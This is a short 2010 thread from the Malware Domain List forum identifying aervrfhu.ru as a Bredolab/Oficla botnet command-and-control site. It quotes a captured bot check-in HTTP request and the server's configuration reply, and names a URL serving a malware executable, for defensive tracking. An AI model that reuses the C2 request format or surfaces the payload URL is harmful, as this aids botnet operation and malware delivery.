Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on February 25, 2010, 05:23:40 pm

Title: aervrfhu.ru - Bredolab/Oficla Check In Site
Post by: eoin.miller on February 25, 2010, 05:23:40 pm: Seeing infected hosts reach back out to aervrfhu.ru to check in:

Code: [Select]
GET /kjflth/bb.php?v=200&id=833711035&b=5541074310&tm=52 HTTP/1.1 User-Agent: Opera\9.64 Host: aervrfhu.ru HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Feb 2010 14:23:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.11 Vary: Accept-Encoding,User-Agent Content-Length: 37 [info]delay:45|upd:0|backurls:[/info]
This trips several snort alerts. Additionally this IP is listed in the MDL with other host names for running the YES exploit kit and Bredolab:

http://www.malwaredomainlist.com/mdl.php?search=193.104.94.45
Title: Re: aervrfhu.ru - Bredolab/Oficla Check In Site
Post by: CkreM on February 25, 2010, 05:31:00 pm: this is oficla C&C

currently downloading a file from:
Code: [Select]
sys.telesweet.net/forums/download/za.exehttp://www.virustotal.com/analisis/e3b4fa1f2686cced685ce0727276db24ba1ebba8cb88d6b357c80d577f37d6be-1267118926

SMF 2.0.18 | SMF © 2021, Simple Machines